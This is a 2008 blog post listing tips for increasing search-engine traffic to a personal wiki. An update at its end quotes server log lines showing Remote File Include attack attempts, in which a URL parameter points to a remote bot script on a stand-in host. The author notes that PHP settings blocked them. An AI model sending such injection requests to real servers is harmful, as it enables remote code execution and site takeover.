Top 10 ways to increase traffic to your wiki
<adsense> google_ad_client = 'pub-0027270078582348'; google_ad_width = 728; google_ad_height = 90; google_ad_slot = '9003651073'; google_ad_format = '728x90_as'; google_ad_type = 'text_image'; google_ad_channel = '3267063621'; google_color_border = 'FFFFFF'; google_color_bg = 'FFFFFF'; google_color_link = '3D81EE'; google_color_text = '000000'; google_color_url = '3D81EE'; </adsense>
On my wiki I journal various tips, usually technical in nature. Often I write a small piece of code of figure out the solution to a strange error message, and I like to post it to my wiki. Most search engine optimization articles relate to general websites or blogs. Wiki's generally do not have regular readership, but people come across them through search engines or direct links. Most SEO tips are about creating stickiness and brands. What I want is different. People who find my wiki, should find the information they were looking for and leave.
Why do I post to my own wiki instead of to [x]? Over the years I've published various helpful guides and answers. For a while I was posting to a well known site which lets 'experts' publish answers to questions. The initial business model was that corporate users would pay for 'expert' credit. Unfortunately, the site turned in to the webs biggest SEO link farm. Often when I search for solutions to computer problems this site shows up as the number one page in Google. I've gone so far as to install a Grease Monkey script to remove these links. The other obvious place to post these sorts of answers are to news groups. Well, many of the things I've figured out don't have a pre-existing question. I figure if I write the answer, people with the question will find it.
So, I've gone to creating a wiki with all sorts of information which I find useful. Where I have relevant information, I want people to be able to find it. Here are some tips I have to make you wiki more accessible to search engines.
Top 10 ways to increase traffic to your wiki
- content, content, content
- The most important thing of course is having good content. It's often hard to figure out what 'good' content is when you write it, but after you put it up it's easy to see what becomes popular. I recommend posting a lot, and improving the articles which become popular. When I posted Java Unique List, I didn't expect it to become the most popular page on my wiki. A number of other articles such as log4j file rotation have risen to the number one spot on a Google search for the term.
- Every site should have a Robots.txt file. This file serves to keep the robot out of areas where it doesn't need to be, and pointed to the ares it should be indexing. A robot does not need to index the history, or click on edit links. I disallow these, and this removes some of the 'noise' from the search engine. If Google indexes your history, it may have both in it's results, and your 'Google juice' will be split between the current page and a history page. Secondly, the robots.txt file lists my sitemaps.
- site maps
- Most wiki software can create a site map. This is important, as it lets robots know exactly what has changed on your website, and what priority it should index things in. This keeps the robots from indexing the sames pages all the time, and helps them find pages which might not be linked to. I'm not sure how to setup a ping to get Google to index a page like a blog does, but it seems to hit my sitemap fairly frequently.
- Wikipedia has a specific policy against original research on it's site. If you've written original research, then it you may want to put the content on your site, and include a reference to your site on Wikipedia. For example, a receive a lot of links from Wikipedia to my Java implementation of a CUSIP check. I don't think Wikipedia needs to have code samples in every language on it's site, but many people find the link to the Java or C code useful. I'm opposed to adding non-relevant external links on Wikipedia, and I actively try to remove them.
- Google Webmaster Tools
- This is a great service provided by Google, and it lets you monitor your crawl stats and query search terms. You can see if non-relevant parts of your website are being index, and what search terms people type in to find your site.
- This is a great, free tool, and many hosting providers have it already setup. You should look at the query search terms, as well as any errors. Additionally, it makes sense to see look for abnormal traffic. This is often the only clue that your site is being covertly spammed. For a while my Magpie RSS reader tool was being used by spammers to make it appear that their content was a part of my site.
- The long tail
- I know my writings serve only a small niche. If you have a wiki, don't try to compete with Wikipedia, but rather, write about specifics which you know a good deal about. One of my more popular pages wiki pages is, and has been GPS Meets Google Maps. I wrote this when Google Maps first came out, and many people since then have wanted to view their runs on a Google map. There's probably not a whole lot of people who own a Forerunner 201 and also want to put the data onto a Google Map, but those who do, often come across my article. Most of the time you have no idea what will become popular, so write about unique things, and you'll find a niche audience.
- keep spam free
- Make sure that spammers aren't polluting your site. Once spammers start to get links into your site, your page rank will go down. You should update your wiki software at least once a year. Often old software contains security holes where spammers can write scripts to directly edit your site. A few times when I ran phpWiki, my entire site was replaced by a spammer. One thing to do is to subscribe to all edits on your site. Even with this, if there is a security hole, you won't get notifications of the changes. MediaWiki has been quite good in regards to security and updates. If there wasn't active development of MediaWiki, I'd probably have to switch to something else. Many of my pages rank #1 on Google with the right set of search terms. Even with CAPTCHA's, spammers will find it worth their time to attack these sorts of pages.
- have a quality web host with good availability
- I've switched to using Slicehost, and have seen a huge improvement in the reduction of Google crawl errors. I don't have enough traffic to start worrying a lot about caching, or high scalability, but I do try to check my pages with YSlow from time to time. If you're hosting your own site you can setup Squid caches so most traffic doesn't have to involve database calls and large amounts of php. This is how Wikipedia is able to scale. When huge volumes of people hit a dynamic page you either have to have lots of servers, or effective caching of the content which isn't changing. Making sure your setting appropriate caching headers on static content can speed up your site quite a bit and reduce your server load as well.
- It's not what it used to be, and unfortunately, is a far cry from what it could be, but it's still an important directory to be a part of. Make sure your site is listed once (and only once) in the directory.
Things I'm not so sure about
- It makes sense to have things spelled correctly, but misspelling is a common SEO tactic. Misspelling certain words will give you ranking for the misspellings, but may not give you traffic. For example, as of this writing, I have the top page for curoisity. When I noticed this, I fixed the spelling on the page, and left a note regarding the original misspelling. We know people misspell and miss type all the time, but I think it looks really bad to have misspellings on your site.
- Social bookmarks
- I'm experimenting with adding social bookmarks on my site.
- Create a top 10 list
- People seem to like to link to these sorts of articles. We'll see if this pages becomes one of my top 10 wiki pages.
September 16, 2008 Update - Page has risen to become a favorite for spam robots
Looks like spammers have found this page, and are trying the old [HTTP Remote File Include] attack. As far as I can tell, it's not working, as I have both register_globals and allow_url_include [turned off].
184.108.40.206 - - [13/Sep/2008:12:44:38 +0000] "GET /wikimedia/index.php/Top_10...ease_traffic_to_your_wiki/errors.php?error=http://example.com/components/com_zoom/images/pbot.txt? HTTP/1.1" 200 9936 "-" "libwww-perl/5.805" 220.127.116.11 - - [13/Sep/2008:13:14:59 +0000] "GET /wikimedia/index.php/Top_10...ease_traffic_to_your_wiki/errors.php?error=http://example.com/sdsdf.gif????? HTTP/1.1" 200 9912 "-" "libwww-perl/5.805"
grep Top_10_ways_to_increase_traffic_to_your_wiki *.log | grep -Eo 'http://[^/]+' | grep -v eggeadventure | sort | uniq -c | sort -rn 161 http://help.yahoo.com 124 http://www.webalta.net 107 http://www.reddit.com 61 http://www.google.com 46 http://www.yanga.co.uk 38 http://search.msn.com 24 http://www.majestic12.co.uk